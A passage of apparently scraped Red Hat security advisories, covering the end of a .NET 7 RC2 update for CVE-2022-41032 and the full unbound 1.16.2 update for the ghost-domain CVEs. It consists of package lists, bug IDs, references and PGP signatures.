5. Bugs fixed (https://bugzilla.redhat.com/):

2132614 - CVE-2022-41032 dotnet: Nuget cache poisoning on Linux via world-writable cache directory  
2134641 - Update .NET 7 to RC 2 [rhel-9.1.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
dotnet7.0-7.0.100-0.5.rc2.el9_1.src.rpm

aarch64:  
aspnetcore-runtime-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
aspnetcore-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-apphost-pack-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-host-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-hostfxr-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-runtime-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-sdk-7.0-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-templates-7.0-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
netstandard-targeting-pack-2.1-7.0.100-0.5.rc2.el9_1.aarch64.rpm

ppc64le:  
aspnetcore-runtime-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
aspnetcore-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-apphost-pack-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-host-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-hostfxr-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-runtime-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-sdk-7.0-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-templates-7.0-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
netstandard-targeting-pack-2.1-7.0.100-0.5.rc2.el9_1.ppc64le.rpm

s390x:  
aspnetcore-runtime-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
aspnetcore-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-apphost-pack-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-host-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-hostfxr-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-runtime-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-sdk-7.0-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-templates-7.0-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.s390x.rpm  
netstandard-targeting-pack-2.1-7.0.100-0.5.rc2.el9_1.s390x.rpm

x86_64:  
aspnetcore-runtime-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
aspnetcore-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-apphost-pack-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-host-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-hostfxr-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-runtime-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-sdk-7.0-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-templates-7.0-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
netstandard-targeting-pack-2.1-7.0.100-0.5.rc2.el9_1.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.aarch64.rpm

ppc64le:  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.ppc64le.rpm

s390x:  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.s390x.rpm

x86_64:  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41032  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3PgudzjgjWX9erEAQiiDg//cdj0qT3ay37iZak9REN0Azfp5yzrAL3P  
7RYtgqDyQ5kVVojzzsto2zqTAQcdkqUutH5RSr4BX/j5H0/yLDPf2MweJv3zzVMf  
DUoftsjVIzCaC+ABZkKx0bsZj+m0Dtm92CP9Zq8pRSg9Np4v+EDI60+jRKDgQ+tN  
mDpDiRjseUlH9EF3DRYfDV7X/xKmBBOoUSRtjWRRAxrSTl8Hm6VD3ZPjsnyLOIar  
jXEGfzvD9uSHPeGRq7WXq+Z9hQsuGI/ioE7gmBB+z8jGM1fYI/FuEntEEVX5bngh  
7gDj0GDIp2KAhN8rsQLSamBtfAXlCSTfLj9aKfiYDawf8AVezZq5k4Gc0+wVJvD7  
xKKTXdmuRwVmUg10bpM06Q55f137m7koAcd0pnu2+fLCe2xa3M7hGUA1hyNcDQJG  
5VUar3m4tOsUNGvkjWMUlr0k1WBq0iygpNAj/fwcSf/NyxMs05GPk+vd62HeDuhk  
4mZ/XoEuvCd9nfwWFdqWrUKtF5rZJjNdaySree1hT5z2X182avaUC9BkUqM6qz9j  
ZvHMhTHQanD8PKZCTSZ5TSkArotnaU3ll+/FeIN+Aokhe0fQ68auoUBkoRyXsXtV  
1cyCXxHrAtv4WEJqfXQ/AIPVQydILJoMQgWaEUOGGnnZPOm67RAjanH9bf6Mrc4A  
XWImElHJm1o=TYQK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8434-01

Red Hat Security Advisory 2022-8062-01 - The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: unbound security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:8062-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8062  
Issue date:        2022-11-15  
CVE Names:         CVE-2022-30698 CVE-2022-30699  
====================================================================  
1. Summary:

An update for unbound is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The unbound packages provide a validating, recursive, and caching DNS or  
DNSSEC resolver.

The following packages have been upgraded to a later upstream version:  
unbound (1.16.2). (BZ#2087120)

Security Fix(es):

* unbound: novel ghost domain attack that allows attackers to trigger  
continued resolvability of malicious domain names (CVE-2022-30698)

* unbound: novel ghost domain attack that allows attackers to trigger  
continued resolvability of malicious domain names (CVE-2022-30699)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.1 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1981415 - unbound: don't use deprecated functions in OpenSSL 3.0  
2056116 - unbound-devel is not available on Centos 9 Stream  
2071543 - Unbound fails resolution of any SHA-1 signed domain [rhel-9.1.0]  
2071943 - failing devel man pages for rhel 9  
2079548 - [unbound: FIPS mode] does not resolve ED25519 and ED448  
2087120 - [rebase] Rebase to 1.16.0  
2094336 - unbound-keygen needs to be stoped  
2116725 - CVE-2022-30698 unbound: novel ghost domain attack that allows attackers to trigger continued resolvability of malicious domain names  
2116729 - CVE-2022-30699 unbound: novel ghost domain attack that allows attackers to trigger continued resolvability of malicious domain names  
2116802 - unbound-keygen requires openssl [rhel9]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
unbound-1.16.2-2.el9.src.rpm

aarch64:  
python3-unbound-1.16.2-2.el9.aarch64.rpm  
python3-unbound-debuginfo-1.16.2-2.el9.aarch64.rpm  
unbound-1.16.2-2.el9.aarch64.rpm  
unbound-debuginfo-1.16.2-2.el9.aarch64.rpm  
unbound-debugsource-1.16.2-2.el9.aarch64.rpm  
unbound-libs-1.16.2-2.el9.aarch64.rpm  
unbound-libs-debuginfo-1.16.2-2.el9.aarch64.rpm

ppc64le:  
python3-unbound-1.16.2-2.el9.ppc64le.rpm  
python3-unbound-debuginfo-1.16.2-2.el9.ppc64le.rpm  
unbound-1.16.2-2.el9.ppc64le.rpm  
unbound-debuginfo-1.16.2-2.el9.ppc64le.rpm  
unbound-debugsource-1.16.2-2.el9.ppc64le.rpm  
unbound-libs-1.16.2-2.el9.ppc64le.rpm  
unbound-libs-debuginfo-1.16.2-2.el9.ppc64le.rpm

s390x:  
python3-unbound-1.16.2-2.el9.s390x.rpm  
python3-unbound-debuginfo-1.16.2-2.el9.s390x.rpm  
unbound-1.16.2-2.el9.s390x.rpm  
unbound-debuginfo-1.16.2-2.el9.s390x.rpm  
unbound-debugsource-1.16.2-2.el9.s390x.rpm  
unbound-libs-1.16.2-2.el9.s390x.rpm  
unbound-libs-debuginfo-1.16.2-2.el9.s390x.rpm

x86_64:  
python3-unbound-1.16.2-2.el9.x86_64.rpm  
python3-unbound-debuginfo-1.16.2-2.el9.i686.rpm  
python3-unbound-debuginfo-1.16.2-2.el9.x86_64.rpm  
unbound-1.16.2-2.el9.x86_64.rpm  
unbound-debuginfo-1.16.2-2.el9.i686.rpm  
unbound-debuginfo-1.16.2-2.el9.x86_64.rpm  
unbound-debugsource-1.16.2-2.el9.i686.rpm  
unbound-debugsource-1.16.2-2.el9.x86_64.rpm  
unbound-libs-1.16.2-2.el9.i686.rpm  
unbound-libs-1.16.2-2.el9.x86_64.rpm  
unbound-libs-debuginfo-1.16.2-2.el9.i686.rpm  
unbound-libs-debuginfo-1.16.2-2.el9.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
python3-unbound-debuginfo-1.16.2-2.el9.aarch64.rpm  
unbound-debuginfo-1.16.2-2.el9.aarch64.rpm  
unbound-debugsource-1.16.2-2.el9.aarch64.rpm  
unbound-devel-1.16.2-2.el9.aarch64.rpm  
unbound-libs-debuginfo-1.16.2-2.el9.aarch64.rpm

ppc64le:  
python3-unbound-debuginfo-1.16.2-2.el9.ppc64le.rpm  
unbound-debuginfo-1.16.2-2.el9.ppc64le.rpm  
unbound-debugsource-1.16.2-2.el9.ppc64le.rpm  
unbound-devel-1.16.2-2.el9.ppc64le.rpm  
unbound-libs-debuginfo-1.16.2-2.el9.ppc64le.rpm

s390x:  
python3-unbound-debuginfo-1.16.2-2.el9.s390x.rpm  
unbound-debuginfo-1.16.2-2.el9.s390x.rpm  
unbound-debugsource-1.16.2-2.el9.s390x.rpm  
unbound-devel-1.16.2-2.el9.s390x.rpm  
unbound-libs-debuginfo-1.16.2-2.el9.s390x.rpm

x86_64:  
python3-unbound-debuginfo-1.16.2-2.el9.i686.rpm  
python3-unbound-debuginfo-1.16.2-2.el9.x86_64.rpm  
unbound-debuginfo-1.16.2-2.el9.i686.rpm  
unbound-debuginfo-1.16.2-2.el9.x86_64.rpm  
unbound-debugsource-1.16.2-2.el9.i686.rpm  
unbound-debugsource-1.16.2-2.el9.x86_64.rpm  
unbound-devel-1.16.2-2.el9.i686.rpm  
unbound-devel-1.16.2-2.el9.x86_64.rpm  
unbound-libs-debuginfo-1.16.2-2.el9.i686.rpm  
unbound-libs-debuginfo-1.16.2-2.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-30698  
https://access.redhat.com/security/cve/CVE-2022-30699  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3PhMdzjgjWX9erEAQi2qg/+JsLmnjmeg2U0b5tZnC5duXL1O4iNyIwm  
V8y6hDiGaY2Iubih0SO29gLZYG3sN+dJdsspe8Vv9OqJso2Gm5J2gjgKZXxe6qZW  
GUKcMRpwG+jM5RSBv9uogsW63tD0YQfIZbFRBJy0BE9TMRFtgHveseKG+OlLKFOP  
2h/SbYILATEZA1Lw/c9KIDBOLB7wNny+Qrg46U1cU9ZH1oN9pOUGjBxH6VfkUA6S  
SItza5DGOnKGbAOVFS79Y+MSCCGjXgIyY38y8mr8PkOh00d7eZ+13JwKnDaPfnxH  
vVdo30jh9Tfs/LX0c+nn3IKyv3h9y2DtMEpxKnI927YRu4WPM9erSrxOX80KrJ+L  
ENkVeb3YdkT+OqV3wvK9JblW8iDwlGSb0jC9LaWUx5An5hUqMKRoXydkKWTnC3Cp  
4fofXWhWnqKQfRwHdx1rVhRuR/x2iG8VY7TvvRNocNb4YW4ilq+dIX0Q++iltna7  
9V1vScJm3mINkqyU4uL2AJJhoDdcPpElvwcxTiRkg7FCn7BO9gj9mxHzO3xZu3RN  
FShTo5J2XIf8a1gtMMHV8C8F7BsAgV7oTMSGlqSLgmx0BKiis/FtO5I2C6Unn/Ac  
Sal3wXzA64ZPyHHDOeRsz0FFkhAMDB6SZzbCuvkaNLaga6z7NTvNaifkXvlnbib3  
QoahqRtuado=Wd6S  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js